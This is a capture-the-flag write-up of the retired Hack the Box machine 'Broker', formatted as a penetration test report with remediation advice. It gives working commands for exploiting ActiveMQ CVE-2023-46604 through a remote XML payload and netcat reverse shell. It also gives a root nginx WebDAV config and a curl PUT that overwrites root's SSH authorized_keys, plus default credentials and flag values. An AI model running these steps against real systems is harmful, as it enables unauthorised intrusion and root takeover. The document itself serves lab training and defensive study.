HTB Broker

HTB Broker is a retired easy level box on Hack the Box. Originally released 09 Nov, 2023, this box focuses on exploiting various back end web technologies both for initial access and privilege escalation.

Initial Access

Vulnerability Examplanation: CVE-2023-46604

The Java OpenWire protocol marshaller is vulnerable to Remote Code Execution. This vulnerability may allow a remote attacker with network access to either a Java-based OpenWire broker or client to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause either the client or the broker (respectively) to instantiate any class on the classpath. Users are recommended to upgrade both brokers and clients to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3 which fixes this issue.

Vulnerability Fix:

  • Please consider upgrading Apache ActiveMQ to the most recent version
  • Please consider developing IDS/IPS detections to monitor port 61616 for relevant payload signatures.

Severity: CVSS 3.1 - 10 CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H

Steps to reproduce the attack:

After the initial nmap scan, the basic auth realm "ActiveMQRealm" was used to begin research on potential vulnerabilities. CVE-2023-46604 was discovered, and a public POC for this CVE was used to gain initial access.

Service enumeration

Port Protocol Version Notes
22/tcp ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp http nginx 1.18.0 (Ubuntu)
8161/tcp http Jetty 9.4.39.v20210325
61616/tcp ActiveMQ ??? Discovered incidentally upon exploitation

The primary nmap scan for this host was as follows:


Nmap scan report for 10.129.107.15
Host is up, received user-set (0.059s latency).
Scanned at 2024-02-27 14:25:21 EST for 11s
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ+m7rYl1vRtnm789pH3IRhxI4CNCANVj+N5kovboNzcw9vHsBwvPX3KYA3cxGbKiA0VqbKRpOHnpsMuHEXEVJc=
|   256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOtuEdoYxTohG80Bo6YCqSzUY9+qbnAFnhsk4yAZNqhM
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Error 401 Unauthorized
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  basic realm=ActiveMQRealm
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Initial Access Method

From the initial nmap scan, ActiveMQRealm was noted as possibly leaking information about web application information. Port 80 was manually browsed to in order to verify, but was found to be secured with basic auth. ActiveMQ's default credential pair admin:admin was attempted and was found to grant authentication. This allowed for the visual confirmation that this was an Apache ActiveMQ instance:

A cursory websearch was performed for "ActiveMQ vulnerability", which returned results for CVE-2023-46604. Given that the CVE was dated to 2023, but the software was copyrighted with a high date of 2020, it was presumed that the version present on the target host might be vulnerable simple due to age.

A websearch was then performed for "CVE-20230-46604 poc", which lead to the discovery of a github, which was then cloned as follows:


git clone https://github.com/evkl1d/CVE-2023-46604.git

After verification of the code for general safety, it was determined that this would be used.

The included file poc.xml was modified as follows to return a reverse shell to the attack box's IP:

A python web server was then built in order to deliver the XML payload:


python3 -m http.server 8080

Then a basic netcat listener was established to catch the reverse shell:


nc -lvnp 9001           

Finally, the exploit code itself was executed, resulting in successful exploitation and the acquisition of a reverse shell:


python3 exploit.py -i 10.129.107.15 -u http://10.10.14.149:8080/poc.xml

Local.txt Value:

b495d2f5e6862be5bb3ae061e5e3b00b

Pivilege Escalation

Vulnerability Examplanation: Nginx sudo arbitrary file write

With sudo privileges assigned to the nginx binary, nginx can be executed from an elevated context using an arbitrary configuration file. This allows for setting up WebDAV services to enable arbitrary file write to any location on the filesystem. This permits re-writing any configuration or key file on the system, which ultimately enables escalation of privileges.

Vulnerability Fix:

  • Please consider utilizing wrapper scripts to restrict sudo use only to the most explicit use cases that the designated user would need to use. E.g. if this user needs to be able to launch nginx under a particular configuration, grant the user sudo rights to a script that launches this particular configuration of nginx, and ensure that the user does not have write access to this script.

Severity: CRITICAL

Steps to reproduce the attack:

Upon initial access, basic enumeration of sudo -l revealed that nginx could be run by the current user:

Searching for "sudo nginx privesc" eventually revealed the following blog post:

https://darrenmartynie.wordpress.com/2021/10/25/zimbra-nginx-local-root-exploit/

The payload given as an example here was modified to allow for WebDAV use of the PUT method as follows:


user root;
worker_processes 4;
pid /tmp/nginx.pid;
events {
worker_connections 768;
}
http {
server {
listen 1337;
root /;
autoindex on;
dav_methods PUT;
}
}

After this, ssh-keygen was then used to create a new key saved at ./root with no passphrase.

Curl was then utilized to overwrite the root user's SSH key using the WebDAV config setup above:


curl -X PUT localhost:1337/root/.ssh/authorized_keys -d "$(cat root.pub)"

The shell was then upgraded to be an interactive shell; this was necessary to access SSH:


python3 -c 'import pty; pty.spawn("/bin/bash")'

Finally, SSH was accessed as the root user:


ssh -i root root@localhost

This successfully produced a root session on the host.

Post Exploitation

Proof.txt Value:

42d367b6909f8db1c33989041d5b334c